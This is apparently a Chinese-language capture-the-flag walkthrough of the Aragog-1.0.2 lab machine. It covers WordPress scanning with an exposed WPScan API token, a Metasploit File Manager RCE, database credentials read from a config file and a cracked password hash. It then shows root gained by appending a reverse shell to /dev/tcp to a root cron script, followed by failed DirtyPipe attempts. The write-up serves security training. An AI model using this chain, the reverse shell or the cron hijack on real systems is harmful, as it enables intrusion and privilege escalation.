每日一靶机-Aragog-1.0.2
靶机:192.168.31.225
靶机:192.168.31.19
以练带学,补充细节,直击痛点,补救遗忘。说的真好听cnm
另外假期呆着也没意思,一个学期啥都没学,水平直接成一坨答辩了
IcMl0x824
Rustscan
┌──(root㉿kali)-[~/Desktop]
└─# rustscan
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'常规扫描:
rustscan -a 192.168.31.225 --ulimit 5000配合nmap参数扫描:
rustscan -a 192.168.31.225 -p 22,80 -- -A Dirsearch
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch -u 192.168.31.225
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| ) WPScan
尽量注册后拿apikey扫描,区别很大
wpscan --url 192.168.31.225/blog --api-token=9VYnNxYKKsOSrXS1gwJWAu3ExS5pq4GZQIVWatREkI8枚举用户
--enumerate u暴力破解
-e u --wordlist 字典扫插件漏洞
-enumerate vp扫主题漏洞
-enumerate vt扫文件漏洞
-enumerate tt注意可选项
--plugins-detection aggressive
三个可选项:mixed(混合), passive(默认), aggressive(主动)合成命令
--enmuerate vp,vt,tt,u --plugins-detection aggressivewpscan --url 192.168.31.225/blog --api-token=9VYnNxYKKsOSrXS1gwJWAu3ExS5pq4GZQIVWatREkI8 -e p --plugins-detection aggressive[!] Title: File Manager 6.0-6.9 -
Unauthenticated Arbitrary File Upload leading to RCE
MSF
search wordpress file managermsf6 exploit(multi/http/wp_file_manager_rce) > set TARGETURI /blog
TARGETURI => /blog
msf6 exploit(multi/http/wp_file_manager_rce) > set rhosts http://192.168.31.225
rhosts => http://192.168.31.225
msf6 exploit(multi/http/wp_file_manager_rce) > set lhost 192.168.31.19
lhost => 192.168.31.19
msf6 exploit(multi/http/wp_file_manager_rce) > runpython
先拿一个tty shell
python3 -c 'import pty;pty.spawn("/bin/bash")'我们知道可以通过python提供的pty模块创建一个原生的终端,利用ctrl+z,stty raw -echo;fg,并最终reset来得到一个完全交互式的终端。那么假设目标环境中没有python环境,那么我们要如何达到这个效果呢?
此处靶机暂未碰到,碰到后再解决。
藏污纳垢
wordpress搭建的网站mysql账号密码会记录在/etc/wordpress目录里的config-default.php 文件里面
www-[email protected]:/etc/wordpress$ cat config-default.php
cat config-default.php
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mySecr3tPass');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');
?>MySQL
无法外连就在shell里连吧
mysql -uroot -pmySecr3tPass -h 127.0.0.1 -P 3306wordpress数据库保存的用户名和密码一般都放在wp_users表
hagrid98 | $P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc. | wp-admin | hagrid98@localhost.local | | 2021-03-31 14:21:02 | | WP-Admin |md5解密
得到hagrid98 |password123
SSH
ssh [email protected] 提权无果
[email protected]:~$ sudo
-bash: sudo: command not found
[email protected]:~$ history
1 ls
2 whoami
3 sudo
4 history使用脚本
Linux_Exploit_Suggester.sh
python
开启一个http服务
┌──(root㉿kali)-[~]
└─# python -m http.server 2333
Serving HTTP on 0.0.0.0 port 2333 (http://0.0.0.0:2333/) ...wget
[email protected]:~$ wget 192.168.31.19:2333/Desktop/linux-exploit-suggester.sh
--2022-12-14 10:06:06-- http://192.168.31.19:2333/Desktop/linux-exploit-suggester.sh
Connecting to 192.168.31.19:2333... connected.
HTTP request sent, awaiting response... 200 OK
Length: 90917 (89K) [text/x-sh]
Saving to: ‘linux-exploit-suggester.sh’
linux-exploit-suggeste 100%[==========================>] 88.79K --.-KB/s in 0s
2022-12-14 10:06:06 (477 MB/s) - ‘linux-exploit-suggester.sh’ saved [90917/90917]
[email protected]:~$ ls
horcrux1.txt linux-exploit-suggester.sh
[email protected]:~$ chmod
chmod 777 linux-exploit-suggester.sh提权扫描结果
[+] [CVE-2019-13272] PTRACE_TRACEME
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
Exposure: highly probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded运行脚本后发现了俩个CVE漏洞 经过实际测试都没能成功提权
[CVE-2019-13272]
kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程删除权限并调用execve(可能允许攻击者控制)。一个影响因素是对象寿命问题(也可能导致恐慌)。另一个影响因素是将ptrace关系标记为特权,这可以通过(例如)Polkit的pkexec帮助程序与PTRACE_TRACEME进行利用。获取root权限。只可在界面模式下利用,总体实际使用比较鸡肋
[CVE-2021-22555]
2021年07月16日,360CERT监测发现
国外安全研究员@theflow公开了CVE-2021-22555 Linux Netfilter提权漏洞的分析报告,漏洞编号为CVE-2021-22555,漏洞等级:高危,漏洞评分:7.8。Linux Netfilter 模块是内核中用于管理网络数据包的一个软件框架,被人熟知的 iptables,nftables等工具均是基于 Netfilter 开发的。该漏洞利用 Netfilter 中 memcopy,memset函数的使用过程中的逻辑不当实现权限提升。
pspy收集信息
pspy - 非特权 Linux 进程监听
pspy 是一个命令行工具,旨在无需 root 权限即可窥探进程。它允许您在执行时查看其他用户运行的命令、cron 作业等。非常适合在 CTF 中枚举 Linux 系统。 也很好地向您的同事展示了为什么在命令行上将秘密作为参数传递是一个坏主意。
该工具从 procfs 扫描中收集信息。放置在文件系统选定部分的 Inotify 观察器会触发这些扫描以捕获短暂的进程。
老法子,把他丢到靶机上去运行看看。
wget 192.168.31.19:2333/Desktop/pspy64.sh[email protected]:~$ ./pspy64.sh
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2022/12/14 10:15:53 CMD: UID=33 PID=996 | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=33 PID=995 | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=33 PID=994 | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=33 PID=990 | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=33 PID=989 | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=0 PID=9 |
2022/12/14 10:15:53 CMD: UID=0 PID=8 |
2022/12/14 10:15:53 CMD: UID=33 PID=633 | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=33 PID=632 | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=33 PID=629 | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=0 PID=6 |
2022/12/14 10:15:53 CMD: UID=0 PID=59 |
2022/12/14 10:15:53 CMD: UID=107 PID=529 | /usr/sbin/mysqld
2022/12/14 10:15:53 CMD: UID=0 PID=50 |
2022/12/14 10:15:53 CMD: UID=0 PID=49 |
2022/12/14 10:15:53 CMD: UID=0 PID=481 | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=0 PID=48 |
2022/12/14 10:15:53 CMD: UID=0 PID=425 | /usr/sbin/sshd -D
2022/12/14 10:15:53 CMD: UID=0 PID=415 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2022/12/14 10:15:53 CMD: UID=0 PID=4 |
2022/12/14 10:15:53 CMD: UID=0 PID=365 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2022/12/14 10:15:53 CMD: UID=0 PID=324 | /usr/sbin/rsyslogd -n -iNONE
2022/12/14 10:15:53 CMD: UID=0 PID=319 | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
2022/12/14 10:15:53 CMD: UID=104 PID=318 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2022/12/14 10:15:53 CMD: UID=0 PID=317 | /usr/sbin/cron -f
2022/12/14 10:15:53 CMD: UID=0 PID=316 | /lib/systemd/systemd-logind
2022/12/14 10:15:53 CMD: UID=0 PID=30 |
2022/12/14 10:15:53 CMD: UID=0 PID=3 |
2022/12/14 10:15:53 CMD: UID=0 PID=29 |
2022/12/14 10:15:53 CMD: UID=101 PID=285 | /lib/systemd/systemd-timesyncd
2022/12/14 10:15:53 CMD: UID=0 PID=28 |
2022/12/14 10:15:53 CMD: UID=0 PID=275 |
2022/12/14 10:15:53 CMD: UID=0 PID=274 |
2022/12/14 10:15:53 CMD: UID=1000 PID=2705 | ./pspy64.sh
2022/12/14 10:15:53 CMD: UID=0 PID=2701 |
2022/12/14 10:15:53 CMD: UID=0 PID=27 |
2022/12/14 10:15:53 CMD: UID=0 PID=2688 |
2022/12/14 10:15:53 CMD: UID=0 PID=26 |
2022/12/14 10:15:53 CMD: UID=0 PID=25 |
2022/12/14 10:15:53 CMD: UID=0 PID=24 |
2022/12/14 10:15:53 CMD: UID=0 PID=236 | /lib/systemd/systemd-udevd
2022/12/14 10:15:53 CMD: UID=0 PID=23 |
2022/12/14 10:15:53 CMD: UID=0 PID=22 |
2022/12/14 10:15:53 CMD: UID=0 PID=217 | /lib/systemd/systemd-journald
2022/12/14 10:15:53 CMD: UID=0 PID=21 |
2022/12/14 10:15:53 CMD: UID=0 PID=20 |
2022/12/14 10:15:53 CMD: UID=0 PID=2 |
2022/12/14 10:15:53 CMD: UID=0 PID=19 |
2022/12/14 10:15:53 CMD: UID=0 PID=187 |
2022/12/14 10:15:53 CMD: UID=0 PID=186 |
2022/12/14 10:15:53 CMD: UID=0 PID=184 |
2022/12/14 10:15:53 CMD: UID=0 PID=18 |
2022/12/14 10:15:53 CMD: UID=0 PID=17 |
2022/12/14 10:15:53 CMD: UID=0 PID=16 |
2022/12/14 10:15:53 CMD: UID=0 PID=153 |
2022/12/14 10:15:53 CMD: UID=0 PID=15 |
2022/12/14 10:15:53 CMD: UID=0 PID=14 |
2022/12/14 10:15:53 CMD: UID=1000 PID=1337 | -bash
2022/12/14 10:15:53 CMD: UID=1000 PID=1336 | sshd: [email protected]/2
2022/12/14 10:15:53 CMD: UID=1000 PID=1323 | (sd-pam)
2022/12/14 10:15:53 CMD: UID=1000 PID=1322 | /lib/systemd/systemd --user
2022/12/14 10:15:53 CMD: UID=0 PID=1319 | sshd: hagrid98 [priv]
2022/12/14 10:15:53 CMD: UID=0 PID=13 |
2022/12/14 10:15:53 CMD: UID=0 PID=12 |
2022/12/14 10:15:53 CMD: UID=33 PID=1186 | /bin/bash
2022/12/14 10:15:53 CMD: UID=33 PID=1185 | python3 -c import pty;pty.spawn("/bin/bash")
2022/12/14 10:15:53 CMD: UID=33 PID=1184 | /bin/sh
2022/12/14 10:15:53 CMD: UID=33 PID=1183 | sh -c /bin/sh
2022/12/14 10:15:53 CMD: UID=33 PID=1182 | python3
2022/12/14 10:15:53 CMD: UID=33 PID=1181 | /bin/bash
2022/12/14 10:15:53 CMD: UID=33 PID=1180 | python3 -c import pty;pty.spawn("/bin/bash")
2022/12/14 10:15:53 CMD: UID=33 PID=1173 | /bin/sh
2022/12/14 10:15:53 CMD: UID=33 PID=1172 |
2022/12/14 10:15:53 CMD: UID=33 PID=1168 | python3
2022/12/14 10:15:53 CMD: UID=33 PID=1162 | /bin/sh
2022/12/14 10:15:53 CMD: UID=33 PID=1161 | sh -c /bin/sh
2022/12/14 10:15:53 CMD: UID=0 PID=113 |
2022/12/14 10:15:53 CMD: UID=33 PID=1113 | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=0 PID=111 |
2022/12/14 10:15:53 CMD: UID=0 PID=110 |
2022/12/14 10:15:53 CMD: UID=0 PID=11 |
2022/12/14 10:15:53 CMD: UID=0 PID=108 |
2022/12/14 10:15:53 CMD: UID=0 PID=107 |
2022/12/14 10:15:53 CMD: UID=0 PID=105 |
2022/12/14 10:15:53 CMD: UID=0 PID=104 |
2022/12/14 10:15:53 CMD: UID=33 PID=1023 | /usr/sbin/apache2 -k start
2022/12/14 10:15:53 CMD: UID=0 PID=101 |
2022/12/14 10:15:53 CMD: UID=0 PID=10 |
2022/12/14 10:15:53 CMD: UID=0 PID=1 | /sbin/init
2022/12/14 10:16:01 CMD: UID=0 PID=2713 | /usr/sbin/CRON -f
2022/12/14 10:16:01 CMD: UID=0 PID=2714 | /usr/sbin/CRON -f
2022/12/14 10:16:01 CMD: UID=0 PID=2715 | /bin/sh -c bash -c "/opt/.backup.sh"
2022/12/14 10:16:01 CMD: UID=0 PID=2716 | /bin/bash /opt/.backup.sh
2022/12/14 10:17:01 CMD: UID=0 PID=2717 | /usr/sbin/CRON -f
2022/12/14 10:17:01 CMD: UID=0 PID=2718 | /usr/sbin/CRON -f
2022/12/14 10:17:01 CMD: UID=0 PID=2719 | /bin/sh -c cd / && run-parts --report /etc/cron.hourly 发现问题
2022/12/14 10:16:01 CMD: UID=0 PID=2716 | /bin/bash /opt/.backup.sh
这个脚本的UID是0,干嘛的,打开看看
[email protected]:~$ cat /opt/.backup.sh
#!/bin/bash
cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads 原来是root在跑定时任务
这个脚本的大概意思是,把上传的文件复制到tmp这个目录里,即拷贝文件 ,说明这个文件每过一段时间就会执行,推测应该被写入了计划任务,这里我们就可以尝试建立一个反弹shell的脚本并通过它这个计划任务来执行,写入就可以了。
bash -c 'exec bash -i &>/dev/tcp/192.168.31.19/4444 <&1'echo
[email protected]:/opt$ cd /tmp
[email protected]:/tmp$ echo "bash -c 'exec bash -i &>/dev/tcp/192.168.31.19/4444 <&1'" >> /opt/.backup.sh
[email protected]:/tmp$ ls
systemd-private-9fb8f7c33ac142689f44e69c12de8dcf-apache2.service-Y0d53W
systemd-private-9fb8f7c33ac142689f44e69c12de8dcf-systemd-timesyncd.service-I7geaz
tmp_wp_uploadsroot
┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.31.19] from (UNKNOWN) [192.168.31.225] 60168
bash: cannot set terminal process group (2764): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~# whoami
whoami
root
[email protected]:~#通杀?
感谢铁子
DirtyPipe 利用(CVE-2022-0847)
月初,国外安全研究人员披露了一个新的Android/Linux内核的高危漏洞,漏洞编号为CVE-2022-0847。由于类似大名鼎鼎的DirtyCOW(脏牛)漏洞,又被命名为DirtyPipe(脏管道)。漏洞从上游linux内核5.8版本的一个补丁引入,影响所有使用linux内核的操作系统,在最新的手机系统Android12+kernel5.10上也有巨大安全危害。经过我们内部研究发现,使用DirtyPipe结合利用技术甚至能够发挥出万花筒写轮眼般的实战效果。
详见老哥文章:https://dirtypipe.cm4all.com/
wget 192.168.31.19:2333/Desktop/CVE-2022-0847/Dirty-Pipe.sh
[email protected]:~$ chmod 777 Dirty-Pipe.sh
[email protected]:~$ ./Dirty-Pipe.sh
./Dirty-Pipe.sh: line 161: gcc: command not found
/etc/passwd已备份到/tmp/passwd
./Dirty-Pipe.sh: line 169: ./exp: No such file or directory
# 恢复原来的密码
rm -rf /etc/passwd
mv /tmp/passwd /etc/passwd
Password:
root
^[[B^[[B^[[B^[[B^[[B^[[Bsu: Authentication failure
[email protected]:~$ rm -rf /etc/passwd
rm: cannot remove '/etc/passwd': Permission denied
[email protected]:~$ mv /tmp/passwd /etc/passwd
mv: replace '/etc/passwd', overriding mode 0644 (rw-r--r--)? 才发现缺少依赖
为了成功编译漏洞,你需要安装 GCC
emmmm
看这里如何在linux非root用户安装gcc
https://blog.csdn.net/u014513863/article/details/128044993
如果说是没有权限,没有依赖的话
用wget下一个gcc的包,手动安装貌似是可以利用的
找其他脚本
wget 192.168.31.19:2333/Desktop/dirty.py
wget 192.168.31.19:2333/Desktop/traitor-amd64
如你所见,脏管道能用到的我基本都用了,还是不太理想并均以失败告终。
还是我太tm菜了,就这样吧!
结束语
该靶机:Aragog-1.0.2
目的:本地定时执行脚本提权到root
文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjMyNDcxMg==&mid=2247497653&idx=1&sn=dcfcdabd205c06d9c95283dbe036930a&chksm=c3056232f472eb24330677168caba1c409d1b84409d7353a79d3c6632a24bbcecc80bfa53601#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh